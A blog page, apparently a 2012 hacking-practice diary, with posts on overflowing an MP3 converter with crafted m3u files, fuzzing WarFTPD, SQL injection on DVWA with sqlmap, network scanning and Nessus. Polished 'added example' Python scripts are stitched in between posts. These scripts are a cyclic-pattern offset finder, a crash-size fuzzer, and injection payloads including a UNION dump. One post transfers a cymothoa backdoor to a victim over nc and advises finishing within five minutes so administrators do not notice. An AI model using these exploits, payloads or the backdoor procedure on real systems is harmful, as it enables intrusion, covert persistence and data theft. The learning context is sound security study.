Sunday, 12 February 2012

exploitation: local exploit for MP3 Converter

Now I try again to overflow RM MP3. In this step, to check the buffer I use three files: the first with 10000 characters, the second with 20000, the third with 30000. I will try them one by one to learn how many characters I need to overflow RM MP3. For this job I use: OllyDBG, Mini Stream RM MP3 Converter, an exploit I wrote myself, and a buffer file I made myself. Ok, let's begin. Starting with 10000 characters: no overflow :'( . Second try, 20000 characters: yupp, overflow. Try again with 30000 characters: yupp, overflow again, boom boom. Now I search for how many bytes it takes to overwrite EIP. I create a 20000-character string pattern to learn how many bytes are needed to reach EIP and ESP. Yupp, got it, boom, crash again :D. Now we will take EIP and ESP...

buffer overflow RM MP3

Now I learn buffer overflow again; this time I make an overflow in RM MP3. To make the overflow I create the file with a perl script:

    my $file = "crash2.m3u";
    my $junk = "\x41" x 30000;   # I change this value to learn how many characters it takes to overflow
    open($FILE, ">$file");
    print $FILE "$junk";
    close($FILE);
    print "m3u File Created successfully\n";

Now I run this script to make the file crash2.m3u; the next step is to open the crash file in MP3 Converter. When I open it in the RM MP3 application nothing crashes, so I have failed. But no problem, I try to make the file with another script, which I take from an exploit-db script:

    my $Header = "#EXTM3U\n";
    my $ex = "http://" . "A" x 26121;
    open(MYFILE, '>>asu.m3u');
    print MYFILE $Header . $ex;
    close(MYFILE);

Then I run this perl script, open the file in RM MP3, and...
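The two posts above do the same job in two steps: first write an .m3u file that crashes the converter, then (in the 12 February post) replace the run of "A"s with a non-repeating pattern so the bytes that land in EIP and ESP reveal their offset in the buffer. The following script is an added example, not the blog's own perl, and it does both: it builds a Metasploit-style pattern (Aa0Aa1Aa2...), lays the file out like the exploit-db style script quoted above (the "#EXTM3U" header followed by an "http://" URL whose host part is the payload), and turns the register value OllyDBG shows into an offset. The output file name "crash_pattern.m3u" and the EIP value 0x41336141 used at the bottom are invented for illustration, not values from the posts.

```python
#!/usr/bin/env python3
"""Cyclic-pattern .m3u crash file plus EIP/ESP offset lookup.

Added example (not the post's script). Assumed, not from the post: the
output file name and the sample EIP value in __main__.
"""
import string


def pattern_create(length: int) -> str:
    """Metasploit-style pattern: Aa0Aa1Aa2...Aa9Ab0Ab1...

    Within the first 26*26*10*3 = 20280 bytes every 4-byte window is unique,
    so the four bytes that overwrite EIP identify their offset exactly.
    """
    if length > 26 * 26 * 10 * 3:
        raise ValueError("pattern longer than 20280 bytes would repeat")
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]


def pattern_offset(pattern: str, value) -> int:
    """Offset of a 4-byte window in `pattern`, or -1 if it is not there.

    `value` is either the 4 ASCII bytes read from the stack dump ("Aa3A") or
    the 32-bit register value as OllyDBG prints it (0x41336141). x86 is
    little-endian, so a register value is byte-reversed before searching.
    """
    if isinstance(value, int):
        needle = value.to_bytes(4, "little").decode("ascii", errors="replace")
    else:
        needle = value
    return pattern.find(needle)


def build_m3u(payload: str, header: str = "#EXTM3U\n", prefix: str = "http://") -> bytes:
    """Same layout as the exploit-db style script: header line, then a URL
    whose host part is the overflow payload."""
    return (header + prefix + payload).encode("latin-1")


def write_crash_file(path: str, length: int) -> str:
    """Write the crash file and return the pattern used, for offset lookup."""
    pattern = pattern_create(length)
    with open(path, "wb") as fh:
        fh.write(build_m3u(pattern))
    return pattern


if __name__ == "__main__":
    pat = write_crash_file("crash_pattern.m3u", 20000)   # assumed file name
    # Constructed sample: suppose OllyDBG reports EIP = 0x41336141 after the
    # converter opens the file. The same call works for the value found at ESP.
    print("EIP overwritten at offset", pattern_offset(pat, 0x41336141))
```

Read the register value straight from the OllyDBG register pane and pass it as an integer; passing the four characters you see on the stack works too, but then you must already have accounted for the byte order yourself.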

Friday, 10 February 2012

download

http://www.mediafire.com/?w77a06erasgs...

exploit development > warftpd

In this next step I learn about buffer overflow; here I try to exploit Windows XP SP3 through a buffer overflow vulnerability. To learn this method I need the WarFTPD application, Metasploit and OllyDBG. To find the vulnerability we need a fuzzer; I use a fuzzer written by mrp.bpp, he is my guru:

    #!/usr/bin/python
    import socket
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    buffer = "\x41" * 1000                          # 1000 bytes of 'A'
    s.connect(('192.168.9.239', 21))                # target IP, FTP port
    data = s.recv(1024)                             # read the banner
    print("sending evil data via USER command..")
    s.send(('USER ' + buffer + '\r\n').encode())    # oversized username
    data = s.recv(1024)
    s.send(('PASS PASSWORD ' + '\r\n').encode())
    s.close()
    print("Finish")

This program is set to the victim IP 192.168.9.239. Now I try to run it... no, I have failed: my WarFTPD can't run when I start it under OllyDBG. I hope I can solve this probl...
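The fuzzer above sends one fixed 1000-byte USER command. The usual next step, once WarFTPD runs under the debugger, is to grow the buffer in steps and note the first size at which the daemon stops answering. The script below is an added example, not mrp.bpp's fuzzer: it keeps the target 192.168.9.239:21 from the post, and the 200-byte step, the 2000-byte ceiling and the 3-second socket timeout are assumptions chosen for illustration.

```python
#!/usr/bin/env python3
"""Incremental USER-command fuzzer for an FTP daemon such as WarFTPD.

Added example, not the post's fuzzer. Assumed (not from the post): step
size, ceiling and timeout. The target address is the one the post uses.
"""
import socket


def build_user_command(length: int, filler: bytes = b"A") -> bytes:
    """USER line carrying `length` filler bytes, CRLF-terminated."""
    return b"USER " + filler * length + b"\r\n"


def fuzz_lengths(start: int, step: int, limit: int):
    """Buffer sizes to try, in order: start, start+step, ... up to limit."""
    return list(range(start, limit + 1, step))


def send_user(host: str, port: int, length: int, timeout: float = 3.0) -> bool:
    """Send one oversized USER command; True if the server is still alive.

    A daemon that has crashed in the debugger either refuses the connection,
    closes it without replying (recv returns b""), or never answers, so all
    three count as "dead".
    """
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.recv(1024)                                  # banner
            s.send(build_user_command(length))
            if not s.recv(1024):                          # expect "331 ..."
                return False
            s.send(b"PASS PASSWORD\r\n")
            return True
    except OSError:                                       # refused, reset, timeout
        return False


def find_crash_length(host: str, port: int, start: int = 100,
                      step: int = 200, limit: int = 2000):
    """First buffer size after which the service stops answering, or None."""
    for n in fuzz_lengths(start, step, limit):
        print(f"sending USER with {n} bytes ...")
        if not send_user(host, port, n):
            return n
    return None


if __name__ == "__main__":
    crash = find_crash_length("192.168.9.239", 21)
    print("no crash up to limit" if crash is None else f"service died at {crash} bytes")
```

Note that the size reported is the one whose request got no answer; the overflow may already have happened one step earlier, so when the debugger has the process paused on the fault, check the register pane rather than trusting the number alone.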

Thursday, 09 February 2012

buffer overflow

Buffer overflow vulnerabilities have been around since the early days of computers and still exist today. Most Internet worms use buffer overflow vulnerabilities to propagate, and even the most recent zero-day VML vulnerability in Internet Explorer is due to a buffer overflow. C is a high-level programming language, but it assumes that the programmer is responsible for data integrity. If this responsibility were shifted over to the compiler, the resulting binaries would be significantly slower, due to integrity checks on every variable. Also, this would remove a significant level of control from the programmer and complicate the language. While C's simplicity increases the programmer's control and the efficiency of the resulting programs, it can also result in programs that are vulnerable...

Dumping Database

If we attack a system through a SQL injection vulnerability we must know where the vulnerability is, and for that we need an application which checks for MySQL injection. I use two applications: sqlmap and Burp Suite. Let's begin the attack. In my article I use a simulation with DVWA; in this simulation I am the user, I search for the database and I will dump it. Ok, now let's begin. I run Burp Suite and open the DVWA website in my browser through the proxy on port 8080, and I capture (the id parameter is the URL-encoded form of 'or 1=1#):

    GET /dvwa/vulnerabilities/sqli/?id=%27or+1%3D1%23&Submit=Submit
    Cookie: security=low; PHPSESSID=1v9l52d4gfr0morfhm1aib3fc0

Now I test it with sqlmap:

    root@cupenk:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=1v9l52d4gfr0morfhm1aib3fc0"

    sqlmap/1.0-dev (r4009) - automatic...

Wednesday, 08 February 2012

SQL Injection & Blind SQL Injection

A SQL injection attack consists of insertion or injection of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands. This form of SQL injection occurs when user input is not filtered for escape characters and is then passed into an SQL statement. This results in the potential manipulation...
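Both posts above turn on the same defect: the DVWA "low" page builds its statement by concatenation, which is why the 'or 1=1 payload in the Burp capture returns every row and why sqlmap can go on to dump the database. The script below is an added example, not DVWA's PHP: it writes the same id lookup twice, once vulnerable and once parameterised, and runs the injected input through each. It uses an in-memory SQLite table with constructed rows instead of MySQL, so the comment marker is "--" rather than MySQL's "#", and it adds a UNION payload that reads another table to show the "read sensitive data" case the description mentions.

```python
#!/usr/bin/env python3
"""DVWA-style id lookup, vulnerable and parameterised, against SQLite.

Added example, not DVWA's code. The users table and its rows are
constructed sample data; SQLite stands in for MySQL.
"""
import sqlite3

# Constructed sample data (DVWA ships similar rows; these are made up).
ROWS = [(1, "admin", "admin"), (2, "Gordon", "Brown"), (3, "Hack", "Me")]


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users(user_id INTEGER, first_name TEXT, last_name TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)", ROWS)
    return db


def lookup_vulnerable(db: sqlite3.Connection, user_id: str):
    """The 'low' security pattern: the value is pasted into the statement,
    so a quote in user_id ends the literal and the rest becomes SQL."""
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return db.execute(sql).fetchall()


def lookup_safe(db: sqlite3.Connection, user_id: str):
    """The fix: the driver sends the value apart from the statement text,
    so nothing in user_id can change the query's structure."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return db.execute(sql, (user_id,)).fetchall()


# Payloads. The first is the Burp capture's 'or 1=1# with SQLite's comment
# marker; the second reads sqlite_master (every table's schema) through the
# injected query, the way sqlmap's --dump reads tables it was never meant to.
TAUTOLOGY = "' OR 1=1 --"
UNION_DUMP = "' UNION SELECT name, sql FROM sqlite_master --"


if __name__ == "__main__":
    db = make_db()
    print("normal:      ", lookup_safe(db, "1"))
    print("vuln + or1=1:", lookup_vulnerable(db, TAUTOLOGY))    # all rows
    print("safe + or1=1:", lookup_safe(db, TAUTOLOGY))          # no rows
    print("vuln + union:", lookup_vulnerable(db, UNION_DUMP))   # table schema
```

The parameterised version returns nothing for the injected input because the whole string is compared, quote and all, against the integer column; it never becomes part of the statement.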

Monday, 06 February 2012

backdooring with nc and cymothoa

In this article I try to explain backdooring with nc and cymothoa. This step is done in the hacking process after we have finished attacking a system. Installing the backdoor on the victim should take no more than 5 minutes after the attack is done; if it takes longer you will fail, because the system administrator will notice what you are doing. You can install the cymothoa backdoor using nc. Run this command on the victim system:

    # nc -l -p 212 > cymothoa

When that is done, run nc on your own system too, to transfer cymothoa:

    root@cupenk:/pentest/backdoors/cymothoa# nc 192.168.0.135 212 < cymothoa

When done, change the access permissions of cymothoa on the victim:

    # chmod +rwx cymothoa

...

privilege escalation: webmin vuln

Hacking on the weekend: how can we get into the system? To get it we must follow the rules of hacking. First step, what should I do? Yes, good information gathering as the first step.

    root@cupenk:~# netdiscover
    Currently scanning: 192.168.48.0/16   |   Screen View: Unique Hosts
    91 Captured ARP Req/Rep packets, from 10 hosts.   Total size: 5460
    _____________________________________________________________________________
      IP              At MAC Address       Count  Len   MAC Vendor
    -----------------------------------------------------------------------------
    192.168.0.40      10:78:d2:36:65:a4    10     600   Unknown vendor
    192.168.0.99      60:eb:69:06:22:ec...

Thursday, 02 February 2012

exploitation of windows xp sp3 with SMB vuln

How to exploit Windows XP SP3 using BackTrack 5 R1? In my article I explore that. My Windows XP SP3 is installed on my VirtualBox; after setting everything up I check communication from my BackTrack to Windows. I try to ping the OS on VirtualBox;

    Currently scanning: 192.168.83.0/16   |   Screen View: Unique Hosts
    5 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 300
    _____________________________________________________________________________
...

scanning vulnerabilities on windows xp sp3 & ubuntu 10.04 default configuration

This time I try scanning for vulnerabilities on Windows XP SP3 and Ubuntu 10.04, with no configuration added to either: all defaults. I will try nmap and Nessus for the scanning. Ubuntu:

    Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-02-02 15:02 WIT
    NSE: Loaded 87 scripts for scanning.
    NSE: Script Pre-scanning.
    Initiating ARP Ping Scan at 15:02
    Scanning 192.168.4.43 [1 port]
    Completed ARP Ping Scan at 15:02, 0.07s elapsed (1 total hosts)
    Initiating Parallel DNS resolution of 1 host. at 15:02
    Completed Parallel DNS resolution of 1 host. at 15:02, 0.00s elapsed
    Initiating SYN Stealth Scan at 15:02
    Scanning 192.168.4.43 [1000 ports]
    Completed SYN Stealth Scan at 15:02, 0.39s elapsed (1000 total ports)
    Initiating Service scan at 15:02
    Initiating...

Wednesday, 01 February 2012

Installing Nessus

In my article I will explore installing Nessus. Nessus is a tool for vulnerability scanning; you can get it at http://nessus.org/download/. For the installation I use BackTrack 5 R1 Gnome, so I take the deb file. To install a deb file you can use the command:

    dpkg -i "filename"

After Nessus is installed you must add a user to log in to the Nessus tool. On the terminal, run:

    /opt/nessus/sbin/nessus-adduser

and fill in a username and password. When you are done creating the user you must register to get the plugins; registration is done at http://www.nessus.org/products/nessus/nessus-homefeed. When done, check your email for the registration code; once you have it, run on the terminal:

    /opt/nessus/bin/nessus-fetch...

Design by Free WordPress Themes | Bloggerized by Cup3nK - Premium Blogger Themes | Hosted Desktop